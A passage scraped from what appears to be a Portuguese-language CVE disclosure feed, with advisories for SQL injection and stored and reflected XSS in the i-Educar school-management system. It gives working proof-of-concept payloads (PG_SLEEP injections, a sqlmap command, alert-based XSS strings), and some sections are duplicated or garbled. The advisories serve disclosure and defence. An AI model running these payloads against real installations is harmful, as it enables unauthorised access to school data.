class="cl">q=0.8,application/signed-exchange;v=b3;q=0.7 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <h3 id="requisição-normal">Requisição normal: </h3><p><img src="/p/cve-2025-10844/image.png" width="1041" height="564" srcset="/p/cve-2025-10844/image_hu_6d08bd4f212812a8.png 480w, /p/cve-2025-10844/image_hu_d5ec1ad3473d1422.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="184" data-flex-basis="442px" /></p> <h3 id="requisição-modificada">Requisição modificada: </h3><p><img src="/p/cve-2025-10844/image-1.png" width="1043" height="561" srcset="/p/cve-2025-10844/image-1_hu_f74db5399c68b638.png 480w, /p/cve-2025-10844/image-1_hu_69ad34c8b657c13.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="446px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10844.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10844.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 23 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10845/ https://www.cvehunters.com/pt/p/cve-2025-10845/ <h2 id="cve-2025-10845-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-modulecomponentecurricularview">CVE-2025-10845: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>module/ComponenteCurricular/view</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10845" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10845</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>module/ComponenteCurricular/view</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-10845-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-modulecomponentecurricularview">CVE-2025-10845: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>module/ComponenteCurricular/view</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10845" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10845</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>module/ComponenteCurricular/view</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>module/ComponenteCurricular/view</code></p> <p>Parâmetro: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">' AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND 'QDaZ'='QDaZ </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-requisição">Exemplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/ComponenteCurricular/view?id=8%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost:8086 </span></span><span class="line"><span class="cl">sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138" </span></span><span class="line"><span class="cl">sec-ch-ua-mobile: ?0 </span></span><span class="line"><span class="cl">sec-ch-ua-platform: "Linux" </span></span><span class="line"><span class="cl">Accept-Language: pt-BR,pt;q=0.9 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) </span></span><span class="line"><span class="cl">Chrome/138.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: </span></span><span class="line"><span class="cl">text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; </span></span><span class="line"><span class="cl">q=0.8,application/signed-exchange;v=b3;q=0.7 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <h3 id="requisição-normal">Requisição normal: </h3><p><img src="/p/cve-2025-10845/image.png" width="1040" height="561" srcset="/p/cve-2025-10845/image_hu_1f049ffa2d1e5806.png 480w, /p/cve-2025-10845/image_hu_818dd237a2bfb1a8.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="444px" /></p> <h3 id="requisição-modificada">Requisição modificada: </h3><p><img src="/p/cve-2025-10845/image-1.png" width="1042" height="562" srcset="/p/cve-2025-10845/image-1_hu_87ce56b58b014bee.png 480w, /p/cve-2025-10845/image-1_hu_1763c7a45ffeff1f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="444px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10845.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10845.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 23 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9532/ https://www.cvehunters.com/pt/p/cve-2025-9532/ <h2 id="cve-2025-9532-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-id-do-endpoint-modulecomponentecurricularedit">CVE-2025-9532: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro <code>id</code> do Endpoint <code>module/ComponenteCurricular/edit</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9532" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9532</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>module/ComponenteCurricular/edit</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-9532-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-id-do-endpoint-modulecomponentecurricularedit">CVE-2025-9532: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro <code>id</code> do Endpoint <code>module/ComponenteCurricular/edit</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9532" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9532</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>module/ComponenteCurricular/edit</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>module/ComponenteCurricular/edit</code></p> <p>Parâmetro: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sqlmap -u "http://localhost:8086/module/ComponenteCurricular/edit?id=8" --cookie="i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE" --batch --dbs --dbms=postgresql </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10846/image.png" width="568" height="139" srcset="/p/cve-2025-10846/image_hu_46dff48085ff5914.png 480w, /p/cve-2025-10846/image_hu_3f5d69f095c33d40.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="408" data-flex-basis="980px" /></p> <p><img src="/p/cve-2025-10846/image-1.png" width="566" height="198" srcset="/p/cve-2025-10846/image-1_hu_fc558fb6fc4f6397.png 480w, /p/cve-2025-10846/image-1_hu_38cb0cffda3c380e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="285" data-flex-basis="686px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 23 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10584/ https://www.cvehunters.com/pt/p/cve-2025-10584/ <h2 id="cve-2025-10584-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_calendario_anotacao_cadphp">CVE-2025-10584: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_calendario_anotacao_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10584" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10584</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_calendario_anotacao_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_anotacao</code> e <code>descricao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_calendario_anotacao_cad.php</code></p><h2 id="cve-2025-10584-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_calendario_anotacao_cadphp">CVE-2025-10584: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_calendario_anotacao_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10584" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10584</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_calendario_anotacao_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_anotacao</code> e <code>descricao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_calendario_anotacao_cad.php</code></p> <p>Parâmetros:<code>nm_anotacao</code> e <code>descricao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nm_anotacao</code> e <code>descricao</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10584/image.png" width="506" height="188" srcset="/p/cve-2025-10584/image_hu_2771ca3675e8bb86.png 480w, /p/cve-2025-10584/image_hu_1ae1524d207e0696.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="269" data-flex-basis="645px" /></p> <p><img src="/p/cve-2025-10584/image-1.png" width="513" height="192" srcset="/p/cve-2025-10584/image-1_hu_9c4497507da3b07c.png 480w, /p/cve-2025-10584/image-1_hu_4de765f0b51183da.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="267" data-flex-basis="641px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10584.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10584.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10590/ https://www.cvehunters.com/pt/p/cve-2025-10590/ <h2 id="cve-2025-10590-cross-site-scripting-xss-refletido-no-endpoint-educar_usuario_detphp-parâmetro-ref_pessoa">CVE-2025-10590: Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_usuario_det.php</code> parâmetro <code>ref_pessoa</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10590" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10590</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>educar_usuario_det.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>ref_pessoa</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_usuario_det.php</code></p> <p>Parâmetro: <code>ref_pessoa</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>q</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-10590-cross-site-scripting-xss-refletido-no-endpoint-educar_usuario_detphp-parâmetro-ref_pessoa">CVE-2025-10590: Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_usuario_det.php</code> parâmetro <code>ref_pessoa</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10590" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10590</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>educar_usuario_det.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>ref_pessoa</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_usuario_det.php</code></p> <p>Parâmetro: <code>ref_pessoa</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>q</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,No known CVE><span class="p"></</span><span class="nt">SCRIPT</span><span class="p">></span>">'><span class="p"><</span><span class="nt">SCRIPT</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mi">88</span><span class="p">,</span><span class="mi">83</span><span class="p">,</span><span class="mi">83</span><span class="p">))</</span><span class="nt">SCRIPT</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10590/image.png" width="1021" height="565" srcset="/p/cve-2025-10590/image_hu_f7f8725a4c3c24c2.png 480w, /p/cve-2025-10590/image_hu_2dd04bd1070639af.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="180" data-flex-basis="433px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10590.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10590.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10591/ https://www.cvehunters.com/pt/p/cve-2025-10591/ <h2 id="cve-2025-10591-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_funcao_cadphp">CVE-2025-10591: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_funcao_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10591" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10591</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_funcao_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>abreviatura</code> e <code>tipoacao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_funcao_cad.php</code></p><h2 id="cve-2025-10591-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_funcao_cadphp">CVE-2025-10591: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_funcao_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10591" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10591</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_funcao_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>abreviatura</code> e <code>tipoacao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_funcao_cad.php</code></p> <p>Parâmetros: <code>abreviatura</code> e <code>tipoacao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>abreviatura</code> e <code>tipoacao</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload-1">Payload 1: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">svg</span> <span class="na">onload</span><span class="o">=</span><span class="s">alert(15888888)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="payload-2">Payload 2: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img 